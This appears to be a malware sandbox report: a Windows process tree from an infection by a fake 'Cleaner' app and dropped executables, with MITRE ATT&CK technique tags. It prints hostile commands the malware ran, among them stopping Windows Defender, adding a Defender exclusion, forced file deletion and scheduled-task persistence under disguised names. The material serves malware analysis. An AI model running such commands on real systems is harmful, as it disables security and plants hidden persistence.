"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:2
5⤵
PID:496

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --mojo-platform-channel-handle=2256 /prefetch:8
5⤵
PID:5184

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2348 /prefetch:1
5⤵
PID:3384

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2396 /prefetch:1
5⤵
PID:5388

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --mojo-platform-channel-handle=3156 /prefetch:8
5⤵
PID:5936

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3180 /prefetch:2
5⤵
PID:7208

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --mojo-platform-channel-handle=2436 /prefetch:8
5⤵
PID:5708

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --mojo-platform-channel-handle=2440 /prefetch:8
5⤵
PID:8124

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --mojo-platform-channel-handle=2488 /prefetch:8
5⤵
PID:8136

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,5155070906888415099,1087932149390022715,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8060_209322615" --mojo-platform-channel-handle=1948 /prefetch:8
5⤵
PID:5628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_107E.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
3⤵
PID:7260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 5464 -ip 5464
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6404 -ip 6404
1⤵
PID:7748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3228 -ip 3228
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 7096 -ip 7096
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 6688 -ip 6688
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 7160 -ip 7160
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6736 -ip 6736
1⤵
PID:6180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6928 -ip 6928
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1492

C:\Users\Admin\AppData\Local\Temp\9A4C.exe
C:\Users\Admin\AppData\Local\Temp\9A4C.exe
1⤵
PID:8020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 6560 -ip 6560
1⤵
PID:7748

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:7260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 460
2⤵
- Program crash
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 460
2⤵
- Program crash
PID:7928

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7400

C:\Users\Admin\AppData\Local\Temp\B4BB.exe
C:\Users\Admin\AppData\Local\Temp\B4BB.exe
1⤵
PID:6324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7260 -ip 7260
1⤵
PID:3996

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 5388 -ip 5388
1⤵
PID:6872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 3536 -ip 3536
1⤵
PID:8052

C:\Users\Admin\AppData\Local\Temp\7136.exe
C:\Users\Admin\AppData\Local\Temp\7136.exe
1⤵
PID:7920

C:\Users\Admin\AppData\Local\Temp\f96eacb1-8886-46be-8576-678ea3b6f07e\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\f96eacb1-8886-46be-8576-678ea3b6f07e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f96eacb1-8886-46be-8576-678ea3b6f07e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f96eacb1-8886-46be-8576-678ea3b6f07e\test.bat"
3⤵
PID:7844

C:\Windows\system32\sc.exe
sc stop windefend
4⤵
PID:8048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7136.exe" -Force
2⤵
PID:1800

C:\Users\Admin\AppData\Local\Temp\7136.exe
C:\Users\Admin\AppData\Local\Temp\7136.exe
2⤵
PID:6952

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 796 -p 8140 -ip 8140
1⤵
PID:2012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Executes dropped EXE
PID:5240

C:\Users\Admin\AppData\Local\Temp\A74A.exe
C:\Users\Admin\AppData\Local\Temp\A74A.exe
1⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\AB62.exe
C:\Users\Admin\AppData\Local\Temp\AB62.exe
1⤵
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 296
2⤵
- Program crash
PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 7196 -ip 7196
1⤵
PID:72

C:\Users\Admin\AppData\Local\Temp\B527.exe
C:\Users\Admin\AppData\Local\Temp\B527.exe
1⤵
PID:6852

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
2⤵
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 1848
3⤵
- Program crash
PID:7184

C:\Users\Admin\AppData\Local\Temp\BF1B.exe
C:\Users\Admin\AppData\Local\Temp\BF1B.exe
1⤵
PID:524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
2⤵
PID:5856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:6784

C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
4⤵
- Kills process with taskkill
PID:240

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:7140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 2408 -ip 2408
1⤵
PID:2920

C:\Users\Admin\AppData\Local\Temp\D5D1.exe
C:\Users\Admin\AppData\Local\Temp\D5D1.exe
1⤵
PID:6156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2nDKu4CxiB.bat"
2⤵
PID:7644

C:\Windows\SysWOW64\chcp.com
chcp 65001
3⤵
- Executes dropped EXE
PID:5680

C:\Windows\SysWOW64\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
3⤵
PID:3844

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
4⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\D5D1.exe
"C:\Users\Admin\AppData\Local\Temp\D5D1.exe"
3⤵
PID:604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AVsuT23MIf.bat"
4⤵
PID:3808

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:2232

C:\Windows\SysWOW64\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
5⤵
PID:7764

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
6⤵
PID:6852

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\msedge_200_percent\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\msedge_200_percent\identity_helper.exe"
5⤵
PID:4812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
PID:7308

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{08fbb885-e083-0349-945e-ac01bea2e80a}\oemvista.inf" "9" "4d14a44ff" "00000000000000F4" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:2188

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180" "8b1d"
2⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\E2F1.exe
C:\Users\Admin\AppData\Local\Temp\E2F1.exe
1⤵
PID:3952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
PID:6680

C:\Users\Admin\AppData\Local\Temp\F4D4.exe
C:\Users\Admin\AppData\Local\Temp\F4D4.exe
1⤵
PID:7368

C:\Users\Admin\AppData\Local\Temp\FCD4.exe
C:\Users\Admin\AppData\Local\Temp\FCD4.exe
1⤵
PID:5580

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5988 -s 876
2⤵
- Program crash
PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5988 -ip 5988
1⤵
PID:7556

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5740

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
PID:7044

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5104

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
1⤵
PID:604

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4968

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6416

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5776

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1148

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\PFRO\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\SysWOW64\networkhelper\msiexec.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "md8_8eus" /sc ONLOGON /tr "'C:\Program Files (x86)\Company\NewProduct\jooyu\md8_8eus.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 1776 -ip 1776
1⤵
PID:2408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "9A4C" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\Setup (17)\9A4C.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Documents\My Videos\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:7712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5712 -ip 5712
1⤵
PID:5856

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:4320

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2284 -ip 2284
1⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 2260 -ip 2260
1⤵
PID:7736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "_xN54NnZnomRPATzFDYJ4i8H" /sc ONLOGON /tr "'C:\Config.Msi\_xN54NnZnomRPATzFDYJ4i8H.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\ideograf\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "identity_helper" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\msedge_200_percent\identity_helper.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:7292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6922648" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\6922648\6922648.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5328

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:7752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 820 -ip 820
1⤵
PID:6996

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 7860 -ip 7860
1⤵
PID:2424

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 6980 -ip 6980
1⤵
PID:6376

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery